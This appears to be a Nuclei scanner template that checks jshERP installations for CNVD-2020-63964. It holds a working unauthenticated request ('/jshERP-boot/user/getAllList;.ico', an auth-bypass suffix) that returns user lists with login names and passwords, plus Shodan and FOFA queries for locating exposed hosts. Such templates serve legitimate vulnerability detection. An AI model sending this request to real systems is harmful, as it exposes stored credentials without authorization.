id: CNVD-2020-63964 info: name: jshERP - Information Disclosure author: brucelsone severity: high description: | jshERP that can reveal sensitive information including system credentials without credentials. reference: - https://cn-sec.com/archives/1798444.html metadata: max-request: 1 shodan-query: http.favicon.hash:-1298131932 fofa-query: jshERP-boot tags: cnvd,cnvd2020,jsherp,disclosure http: - method: GET path: - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico" matchers-condition: and matchers: - type: word words: - '"username":' - '"loginName":' - '"password":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950